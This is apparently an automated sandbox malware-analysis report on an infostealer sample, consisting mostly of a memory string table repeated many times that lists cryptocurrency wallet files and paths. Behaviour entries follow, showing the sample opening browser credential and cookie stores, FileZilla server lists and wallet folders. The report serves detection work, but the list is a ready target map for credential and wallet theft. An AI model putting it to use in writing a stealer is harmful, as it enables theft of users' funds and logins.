Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: q27UFusYdn.exe, 00000000.00000002.2177189575.0000000004192000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\q27UFusYdn.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\q27UFusYdn.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\q27UFusYdn.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
